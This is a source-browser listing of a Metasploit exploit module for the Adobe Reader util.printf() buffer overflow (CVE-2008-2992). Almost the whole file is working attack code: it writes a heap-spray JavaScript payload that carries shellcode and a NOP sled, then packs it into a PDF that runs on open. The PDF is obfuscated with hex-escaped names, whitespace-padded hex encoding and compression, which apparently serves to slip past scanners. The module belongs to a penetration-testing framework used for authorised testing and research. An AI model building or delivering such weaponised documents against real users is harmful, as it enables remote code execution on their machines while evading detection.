Context Navigation

adobe_utilprintf.rb

Revision 6697, 5.2 KB (checked in by hdm, 12 days ago)
Remove overzealous change for 1.9.1 compat
Property svn:eol-style set to `native` Property svn:keywords set to `Rev Revision Id Header`

Line
1	###
2	## This file is part of the Metasploit Framework and may be subject to
3	## redistribution and commercial restrictions. Please see the Metasploit
4	## Framework web site for more information on licensing and terms of use.
5	## http://metasploit.com/framework/
6	###
7
8	require 'msf/core'
9	require 'zlib'
10
11	class Metasploit3 < Msf::Exploit::Remote
12
13	include Msf::Exploit::FILEFORMAT
14
15	def initialize(info = {})
16	super(update_info(info,
17	'Name' => 'Adobe util.printf() Buffer Overflow',
18	'Description' => %q{
19	This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional
20	< 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf()
21	entry, an attacker may be able to execute arbitrary code.
22	},
23	'License' => MSF_LICENSE,
24	'Author' => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>' ],
25	'Version' => '$Revision$',
26	'References' =>
27	[
28	[ 'CVE', '2008-2992' ],
29	[ 'OSVDB', '49520' ]
30	],
31	'DefaultOptions' =>
32	{
33	'EXITFUNC' => 'process',
34	},
35	'Payload' =>
36	{
37	'Space' => 1024,
38	'BadChars' => "\x00",
39	},
40	'Platform' => 'win',
41	'Targets' =>
42	[
43	[ 'Adobe Reader v8.1.2 (Windows XP SP3 English)', { 'Ret' => '' } ],
44	],
45	'DisclosureDate' => 'Feb 8 2008',
46	'DefaultTarget' => 0))
47
48	register_options(
49	[
50	OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
51	], self.class)
52
53	end
54
55	def exploit
56	# Encode the shellcode.
57	shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
58
59	# Make some nops
60	nops = Rex::Text.to_unescape(make_nops(4))
61
62	# Randomize variables
63	rand1 = rand_text_alpha(rand(100) + 1)
64	rand2 = rand_text_alpha(rand(100) + 1)
65	rand3 = rand_text_alpha(rand(100) + 1)
66	rand4 = rand_text_alpha(rand(100) + 1)
67	rand5 = rand_text_alpha(rand(100) + 1)
68	rand6 = rand_text_alpha(rand(100) + 1)
69	rand7 = rand_text_alpha(rand(100) + 1)
70	rand8 = rand_text_alpha(rand(100) + 1)
71	rand9 = rand_text_alpha(rand(100) + 1)
72	rand10 = rand_text_alpha(rand(100) + 1)
73	rand11 = rand_text_alpha(rand(100) + 1)
74
75	script = %Q\|
76	var #{rand1} = unescape("#{shellcode}");
77	var #{rand2} ="";
78	for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");
79	#{rand4} = #{rand2} + #{rand1};
80	#{rand5} = unescape("#{nops}");
81	#{rand6} = 20;
82	#{rand7} = #{rand6}+#{rand4}.length
83	while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};
84	#{rand8} = #{rand5}.substring(0, #{rand7});
85	#{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});
86	while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};
87	#{rand10} = new Array();
88	for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};
89	util.printf("%45000.45000f", 0);
90	\|
91
92	# Create the pdf
93	pdf = make_pdf(script)
94
95	print_status("Creating '#{datastore['FILENAME']}' file...")
96
97	file_create(pdf)
98	end
99
100	def RandomNonASCIIString(count)
101	result = ""
102	count.times do
103	result << (rand(128) + 128).chr
104	end
105	result
106	end
107
108	def ioDef(id)
109	"%d 0 obj" % id
110	end
111
112	def ioRef(id)
113	"%d 0 R" % id
114	end
115
116	#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
117	def nObfu(str)
118	result = ""
119	str.scan(/./u) do \|c\|
120	if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
121	result << "#%x" % c.unpack("C*")[0]
122	else
123	result << c
124	end
125	end
126	result
127	end
128
129	def ASCIIHexWhitespaceEncode(str)
130	result = ""
131	whitespace = ""
132	str.each_byte do \|b\|
133	result << whitespace << "%02x" % b
134	whitespace = " " * (rand(3) + 1)
135	end
136	result << ">"
137	end
138
139	def make_pdf(js)
140
141	xref = []
142	eol = "\x0d\x0a"
143	endobj = "endobj" << eol
144
145	# Randomize PDF version?
146	pdf = "%%PDF-%d.%d" % [1 + rand(2), 1 + rand(5)] << eol
147	pdf << "%" << RandomNonASCIIString(4) << eol
148	xref << pdf.length
149	pdf << ioDef(1) << nObfu("<</Type/Catalog/Outlines ") << ioRef(2) << nObfu("/Pages ") << ioRef(3) << nObfu("/OpenAction ") << ioRef(5) << ">>" << endobj
150	xref << pdf.length
151	pdf << ioDef(2) << nObfu("<</Type/Outlines/Count 0>>") << endobj
152	xref << pdf.length
153	pdf << ioDef(3) << nObfu("<</Type/Pages/Kids[") << ioRef(4) << nObfu("]/Count 1>>") << endobj
154	xref << pdf.length
155	pdf << ioDef(4) << nObfu("<</Type/Page/Parent ") << ioRef(3) << nObfu("/MediaBox[0 0 612 792]>>") << endobj
156	xref << pdf.length
157	pdf << ioDef(5) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(6) + ">>" << endobj
158	xref << pdf.length
159	compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))
160	pdf << ioDef(6) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
161	pdf << "stream" << eol
162	pdf << compressed << eol
163	pdf << "endstream" << eol
164	pdf << endobj
165	xrefPosition = pdf.length
166	pdf << "xref" << eol
167	pdf << "0 %d" % (xref.length + 1) << eol
168	pdf << "0000000000 65535 f" << eol
169	xref.each do \|index\|
170	pdf << "%010d 00000 n" % index << eol
171	end
172	pdf << "trailer" << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(1) << ">>" << eol
173	pdf << "startxref" << eol
174	pdf << xrefPosition.to_s() << eol
175	pdf << "%%EOF" << eol
176
177	end
178
179	end

Note: See TracBrowser for help on using the browser.

Context Navigation

root/framework3/trunk/modules/exploits/windows/fileformat/adobe_utilprintf.rb

Download in other formats: